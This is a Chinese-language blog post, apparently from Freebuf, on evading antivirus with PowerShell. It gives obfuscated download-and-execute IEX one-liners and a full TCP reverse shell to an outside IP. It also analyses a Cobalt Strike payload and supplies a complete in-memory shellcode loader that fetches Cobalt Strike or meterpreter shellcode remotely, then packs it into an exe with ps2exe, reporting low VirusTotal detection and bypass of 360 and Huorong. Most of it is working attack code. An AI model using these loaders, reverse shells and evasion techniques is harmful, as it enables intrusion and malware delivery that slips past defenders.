前言

文章首發(fā)于Freebuf
在之前發(fā)布的一篇 滲透技巧之Powershell實(shí)戰(zhàn)思路 中，學(xué)習(xí)了powershell在對(duì)抗Anti-Virus的方便和強(qiáng)大。團(tuán)隊(duì)免殺系列又有了遠(yuǎn)控免殺從入門到實(shí)踐(6)-代碼篇-Powershell 更是拓寬了自己的認(rèn)知。這里繼續(xù)學(xué)習(xí)powershell在對(duì)抗Anti-Virus的騷姿勢(shì)。

繞過執(zhí)行策略

powershell 可以通過繞過執(zhí)行策略來執(zhí)行惡意程序。
而從文件是否落地可以簡(jiǎn)單分為落地的bypass、不落地的bypass。
以落地為例

powershell -ExecutionPolicy bypass -File  a.ps1    

以不落地為例，如我們熟知的IEX

powershell  -c "IEX(New-Object Net.WebClient).DownloadString('http://xxx.xxx.xxx/a')"

從免殺上來說，查殺比較嚴(yán)格的當(dāng)然是不落地文件的這種方式。
我們可以將兩種方式混用來實(shí)現(xiàn)簡(jiǎn)單的bypass
如：

echo Invoke-Expression(new-object net.webclient).downloadstring('http://xxx.xxx.xxx/a') | powershell -

如：

powershell -c "IEX(New-Object Net.WebClient).DownloadString('d://a')"

簡(jiǎn)單混淆

powershell混淆姿勢(shì)有很多，如字符串轉(zhuǎn)換、變量轉(zhuǎn)換、編碼、壓縮等等。根據(jù)powershell語言的特性來混淆代碼，從而繞過Anti-Virus。

處理powershell

利用cmd的混淆以不同的姿勢(shì)調(diào)用powershell
如利用win10環(huán)境變量截取出powershell

%psmodulepath:~24,10%

處理IEX

為IEX設(shè)置別名

powershell set-alias -name cseroad -value Invoke-Expression;cseroad(New-Object Net.WebClient).DownloadString('http://xxx.xxx.xxx/a')

處理downloadstring

使用轉(zhuǎn)義符

"Down`l`oadString"

處理http

以變量的方式拆分http

powershell "$a='((new-object net.webclient).downloadstring(''ht';$b='tp://109.xx.xx.xx/a''))';IEX ($a+$b)"   

以中文單引號(hào)分割

ht‘+’tp

基于以上混淆基礎(chǔ)，就可以實(shí)現(xiàn)多種bypass的姿勢(shì)
如：

cmd /c "set p1=power&& set p2=shell&& cmd /c echo (New-Object Net.WebClient).DownloadString("http://109.xx.xx/a") ^|%p1%%p2% -"

如：

echo Invoke-Expression (New-Object "NeT.WebClient")."Down`l`oadString"('h'+'ttp://106.xx.xx.xx/a') | powershell -

如：

chcp 1200 & powershell  -c "IEX(New-Object Net.WebClient)."DownloadString"('ht‘+’tp://xx.xx.xx/a')"

這里再分享一個(gè)小技巧：
在測(cè)試對(duì)抗某些殺毒軟件時(shí)，發(fā)現(xiàn)對(duì)cmd下操作查殺比較嚴(yán)格，相對(duì)來說powershell環(huán)境下更容易bypass。
而實(shí)際中可能更多的默認(rèn)為cmd。我們可以先用socket一句話反彈powershell環(huán)境，再執(zhí)行后續(xù)操作。
客戶端執(zhí)行命令：

powershell  -c "$client = New-Object Net.Sockets.TCPClient('106.xxx.xxx.xxx',9090);$stream = $client.GetStream(); [byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){; $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback=(iex $data 2>&1 | Out-String );$sendata =$sendback+'PS >';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendata);$leng=$sendbyte.Length;$stream.Write($sendbyte,0,$leng);$stream.Flush()};$client.Close()"

服務(wù)端nc監(jiān)聽即可：

nc -lvp 9090

以此來迂回得達(dá)到我們的目的。

分析CobaltStrike powershell command

這里使用CobaltStrike 4.1來生成payload

image.png

訪問83端口的a文件，獲取payload代碼。
查看代碼，可以看到先使用base64解碼一段字符串，又通過IO.Compression.GzipStream解壓縮，并將代碼進(jìn)行IEX執(zhí)行。

$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("xxx"));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();

修改IEX為echo，保存為aaaa.ps1文件，運(yùn)行得到源碼。

powershell -ExecutionPolicy bypass -File  aaaaa.ps1 >> old.txt

image.png

可以看出大概分為func_get_delegate_type、func_get_proc_address兩個(gè)函數(shù)，然后是一個(gè)base64解碼的函數(shù)，且將byte數(shù)組進(jìn)行了xor的異或操作。然后分配一些內(nèi)存，將有效負(fù)載復(fù)制到分配的內(nèi)存空間中。最后判斷計(jì)算機(jī)架構(gòu)并執(zhí)行。

那么關(guān)鍵位置就應(yīng)該是這串base編碼的數(shù)據(jù)了。事實(shí)上，這段數(shù)據(jù)是bin文件編碼得來的。
我們將該byte數(shù)組保存為new.bin文件。

$enc=[System.Convert]::FromBase64String('base64編碼字符串')
for ($x = 0; $x -lt $enc.Count; $x++) {
    $enc[$x] = $enc[$x] -bxor 35
}
$infile = [System.IO.File]::WriteAllBytes("new.bin",$enc)

而后修改為讀取new.bin文件內(nèi)容到內(nèi)存后再上線。
即

[Byte[]]$var_code = [System.IO.File]::ReadAllBytes('new.bin')

其余代碼未修改。

image.png

執(zhí)行后可正常上線。
放入VT查殺一下11/59

image.png

這時(shí)候我們就得到了powershell版的一個(gè)加載器，繼續(xù)嘗試修改該加載器本身的一些特征。

• 對(duì)func_get_delegate_type，func_get_proc_address兩個(gè)函數(shù)重命名替換，對(duì)函數(shù)里面的一些變量進(jìn)行重新定義
• 重命名$DoIt為$aaaa
• 修改IEX為I`EX
• 修改Invoke為Inv'+'oke
• 替換$var_code為$acode

放入VT再次查殺2/58

image.png

powershell加載器

上面的腳本通過讀取new.bin中的字節(jié)數(shù)組并在內(nèi)存執(zhí)行從而成功使cobalt strike上線。
那同樣可以從遠(yuǎn)程文件讀取shellcode，并加載到內(nèi)存執(zhí)行，來實(shí)現(xiàn)payload無落地。

加載器代碼如下：

Set-StrictMode -Version 2

function func_get_delegate_type_new {
    Param (
        [Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,
        [Parameter(Position = 1)] [Type] $var_return_type = [Void]
    )
    $var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
    $var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed')
    $var_type_builder.DefineMethod('Inv'+'oke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed')
    return $var_type_builder.CreateType()
}

function func_get_proc_address_new {
    Param ($var_module, $var_procedure)     
    $var_unsafe_native_methods = [AppDomain]::CurrentDomain.GetAssemblies()
    $var_unsafe_native_methods_news = ($var_unsafe_native_methods  | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
    $var_gpa = $var_unsafe_native_methods_news.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))
    return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods_news.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure))
}

If ([IntPtr]::size -eq 8) {
    [Byte[]]$acode = (New-Object Net.WebClient)."Down`l`oadData"($args[0])
    $var_va = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_get_proc_address_new kernel32.dll VirtualAlloc), (func_get_delegate_type_new @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))
    $var_buffer = $var_va.Invoke([IntPtr]::Zero, $acode.Length, 0x3000, 0x40)
    [System.Runtime.InteropServices.Marshal]::Copy($acode, 0, $var_buffer, $acode.length)
    $var_runme = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($var_buffer, (func_get_delegate_type_new @([IntPtr]) ([Void])))
    $var_runme.Invoke([IntPtr]::Zero)

}

CobaltStrike生成payload.bin文件時(shí)，注意勾選x64。

image.png

將該payload.bin文件放置在遠(yuǎn)程服務(wù)器上，powershell執(zhí)行bypass操作。

powershell -ExecutionPolicy bypass -File old.ps1 http://106.xx.xx.xx/payload.bin

CobaltStrike正常上線。

image.png

metasploit 也是同樣的道理。使用msfvenom生成raw文件，看看加載器是否通用。
生成raw木馬

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.211.55.26 LPORT=4444 -f raw -e x86/shikata_ga_nai -i 5 -o /var/www/html/shell.bin

powershell直接利用加載器加載該bin文件。

powershell -ExecutionPolicy bypass -File a.ps1 http://10.211.55.26/shell.bin

metasploit 也可以正常上線。

image.png

powershell轉(zhuǎn)exe

在修改了加載器之后，我們還可以通過powershell代碼將其加載器轉(zhuǎn)換為exe程序。
借助Win-PS2EXE項(xiàng)目，通過ps2exe.ps1腳本將加載器轉(zhuǎn)為exe文件。更方便實(shí)戰(zhàn)中使用。

powershell.exe -ExecutionPolicy bypass  -command "&'.\ps2exe.ps1' -inputFile 'old.ps1' -outputFile 'aaa.exe'" -runtime40  -noConsole

-runtime20 指定powershell2.0/3.0版本，-runtime40 指定powershell4.0版本，-noConsole 隱藏窗口執(zhí)行

image.png

查殺率5/70

image.png

測(cè)試可在powershell任意環(huán)境下運(yùn)行，且過360、火絨。

image.png

總結(jié)

1. 利用cmd、powershell語法混淆實(shí)現(xiàn)了bypass；
2. 簡(jiǎn)單分析CobaltStrike powershell payload 獲得powershell版本的shellcode加載器；
3. 利用Win-PS2EXE 項(xiàng)目轉(zhuǎn)換為exe更方便實(shí)際利用。

參考資料

https://evi1.cn/post/powershell-bypass-2/
https://rootrain.me/2020/02/29/%E5%86%85%E7%BD%91%E9%98%B2%E5%BE%A1%E8%A7%84%E9%81%BF(%E4%BA%8C)-%E5%91%BD%E4%BB%A4%E8%A1%8C%E6%B7%B7%E6%B7%86/#0x04-%E5%9E%83%E5%9C%BE%E5%88%86%E9%9A%94%E7%AC%A6
https://www.anquanke.com/post/id/86637